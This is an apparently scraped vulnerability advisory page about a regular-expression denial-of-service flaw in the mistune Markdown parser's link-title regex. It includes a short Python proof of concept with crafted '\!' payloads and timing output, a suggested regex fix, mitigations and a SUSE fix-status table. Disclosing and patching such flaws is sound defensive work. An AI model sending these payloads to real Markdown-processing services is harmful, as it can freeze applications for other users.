Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Primary rating from Vendor (https://github.com/lepture/mistune).
CVSS VectorVendor: https://github.com/lepture/mistune
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionCVE.org
Summary
A ReDoS (Regular Expression Denial of Service) vulnerability in LINK_TITLE_RE allows an attacker who can supply Markdown for parsing to cause denial of service. A crafted 58-byte Markdown document blocks the parser for approximately 6 seconds (measured on Apple M2, Python 3.14.3), with exponential growth per additional byte pair.
Details
The vulnerable regex is defined in src/mistune/helpers.py#L20-L25:
LINK_TITLE_RE = re.compile(
r"[ \t\n]+("
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|'
# "title"
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"
# 'title'
r")"
)The double-quote branch compiles to "(?:\\[PUNCTUATION]|[^"\x00])*". The two alternatives inside (A|B)* overlap: a backslash followed by a punctuation character (e.g. \!) can be matched by either branch - as a 2-character escaped-punctuation sequence \\!, or as two individual [^"\x00] characters (\ then !). The same ambiguity exists in the single-quoted title branch.
When the input contains repeated \! pairs with no closing ", the regex engine exhaustively backtracks through all 2^N combinations, resulting in exponential O(2^N) time complexity.
This is reachable through normal Markdown parsing via two code paths:
- Inline links:
[text](url "PAYLOAD)→parse_link()→parse_link_title() - Block link reference definitions:
[label]: url "PAYLOAD→BlockParser.parse_ref_link()→parse_link_title()at block_parser.py#L259
PoC
import mistune
import time
md = mistune.create_markdown()
# Test with increasing N (number of \! pairs)
for n in [15, 18, 20, 22, 25]:
payload = '[x](y "' + '\\!' * n + ')'
start = time.time()
md(payload)
elapsed = time.time() - start
print(f"N={n:2d} len={len(payload):3d} bytes time={elapsed:.3f}s")Output (Apple M2, Python 3.14.3, mistune 3.2.0):
N=15 len= 38 bytes time=0.007s
N=18 len= 44 bytes time=0.044s
N=20 len= 48 bytes time=0.178s
N=22 len= 52 bytes time=0.740s
N=25 len= 58 bytes time=5.922sEach increment of N roughly doubles the execution time (consistent with O(2^N)).
The same attack works via block link reference definitions:
payload = '[l]: u "' + '\\!' * 25
# 58 bytes, ~6 seconds
md(payload)Impact
This is a denial of service vulnerability. Any application or service that parses user-supplied Markdown using mistune can be made unresponsive by an attacker submitting a small crafted input (under 100 bytes).
Affected use cases include:
- Web applications with Markdown-enabled input fields (comments, posts, descriptions)
- Documentation systems that accept user contributions
- API endpoints that process Markdown
- Jupyter tooling such as nbconvert that relies on mistune for rendering
Suggested Fix
Exclude the backslash character from the catch-all character class to eliminate the alternation overlap:
# Before (vulnerable):
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"
# After (fixed):
r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"'
r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"This ensures a backslash can only be consumed by the escaped-punctuation branch, eliminating the ambiguity in both the double-quote and single-quote branches. Verified on mistune 3.2.0 (Apple M2, Python 3.14.3):
- Reduces N=25 from 4.2 seconds to 0.000006 seconds (700,000x improvement)
- Handles N=50 in 0.000008 seconds
- Passes all existing functional tests (quoted titles, escaped quotes, escaped punctuation)
AnalysisAI
Regular Expression Denial of Service in mistune's link title parser enables attackers to freeze Python applications with 58-byte Markdown payloads. The LINK_TITLE_RE regex in mistune 3.0.0a1 through 3.2.0 exhibits catastrophic backtracking (O(2^N) time complexity) when parsing link titles with repeated escaped punctuation patterns, blocking a parser thread for approximately 6 seconds on modern hardware with exponential growth per additional byte pair. Publicly available exploit code exists (demonstrated in the GitHub advisory with working PoC), enabling trivial weaponization against web applications, documentation systems, Jupyter tooling, and API endpoints that process user-supplied Markdown. CVSS 8.7 (CVSS:4.0/AV:N/AC:L/PR:N/UI:N/VA:H) reflects the network-accessible, zero-prerequisite nature of the attack, though the High availability impact assumes single-threaded parsing or resource-constrained environments.
Technical ContextAI
The vulnerability resides in mistune's helpers.py module, specifically the LINK_TITLE_RE compiled regular expression used for parsing Markdown link title attributes. This regex contains a nested quantifier with overlapping alternation branches: the pattern '(?:\PUNCTUATION|[^"\x00])*' allows a backslash-punctuation sequence like '\!' to match via either the explicit escape branch (\PUNCTUATION as a 2-character unit) or the catch-all character class (backslash and punctuation as two separate [^"\x00] matches). When the regex engine encounters repeated '\!' pairs without a closing quote delimiter, it must explore all 2^N combinations of how to partition the input between these two overlapping branches, causing exponential-time catastrophic backtracking. This is a textbook instance of CWE-1333 (Inefficient Regular Expression Complexity), where poorly constructed regex alternation leads to algorithmic complexity attacks. The vulnerability is reachable through standard Markdown parsing code paths: inline link syntax '[text](url "PAYLOAD)' via parse_link() and reference-style link definitions '[label]: url "PAYLOAD' via BlockParser.parse_ref_link(), both of which invoke the vulnerable parse_link_title() function. Mistune is a widely-used Python Markdown parser with approximately 7 million downloads per month, deployed in frameworks like Jupyter nbconvert, static site generators, and web applications requiring Markdown rendering.
RemediationAI
Apply the vendor-provided code-level fix by modifying src/mistune/helpers.py to exclude backslash from the catch-all character class in LINK_TITLE_RE: change '(?:\\PUNCTUATION|[^"\x00])*' to '(?:\\PUNCTUATION|[^"\\\x00])*' for double-quoted titles, and similarly for single-quoted titles. This eliminates the alternation overlap that enables exponential backtracking. The fix has been validated by the vendor to reduce N=25 payload processing from 4.2 seconds to 6 microseconds with no functional test regressions, handling N=50 in 8 microseconds. However, no official patched release version is identified in the provided intelligence data-organizations must either apply the regex patch manually to their installed mistune package or monitor https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp for an upcoming release. Compensating controls for environments unable to patch immediately: (1) Implement strict request timeouts (recommended 1-2 seconds maximum for Markdown parsing operations) at the application or reverse proxy layer to prevent thread exhaustion-trade-off is potential false positives on legitimate complex documents; (2) Apply rate limiting to Markdown input endpoints (e.g., 10 requests per minute per IP) to slow mass exploitation attempts-less effective against distributed attacks; (3) Enforce maximum input length restrictions (e.g., 10KB) before passing to mistune, though note the PoC demonstrates impact at only 58 bytes so size limits must be carefully tuned; (4) Deploy mistune parsing in isolated worker processes with CPU/memory resource limits (e.g., Docker containers with cgroup constraints) to contain blast radius-adds operational complexity and latency. None of these mitigations eliminate the vulnerability; upgrading to a patched version once available is the definitive solution.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same technique Denial Of Service
View allVendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| SUSE Linux Enterprise Desktop 15 SP7 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 16.0 | Fixed |
| SUSE Linux Enterprise Server 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP6 | Fixed |
| SUSE Linux Enterprise Server 15 SP4 | Fixed |
| SUSE Linux Enterprise Server 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP5 | Fixed |
| SUSE Linux Enterprise Server 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP6 | Fixed |
| SUSE Linux Enterprise Server 15 SP6-LTSS | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | Fixed |
| SUSE Manager Proxy 4.3 | Fixed |
| SUSE Manager Retail Branch Server 4.3 | Fixed |
| SUSE Manager Server 4.3 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP4 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP5 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP6 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | Fixed |
| openSUSE Leap 15.3 | Fixed |
| openSUSE Leap 15.4 | Fixed |
| openSUSE Leap 15.5 | Fixed |
| openSUSE Leap 15.6 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-27877
GHSA-8mp2-v27r-99xp